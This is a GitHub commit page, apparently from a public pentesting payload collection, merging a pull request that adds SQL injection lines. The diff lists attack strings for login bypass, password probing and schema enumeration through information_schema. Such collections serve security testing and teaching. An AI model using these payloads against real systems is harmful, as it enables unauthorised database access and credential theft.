Merge pull request #76 from ElonSalfati/master

Added 2 working sql injection lines
This commit is contained in:
Swissky 2019-06-28 17:30:12 +02:00 committed by GitHub
commit b148a9c906
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -117,4 +117,5 @@
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'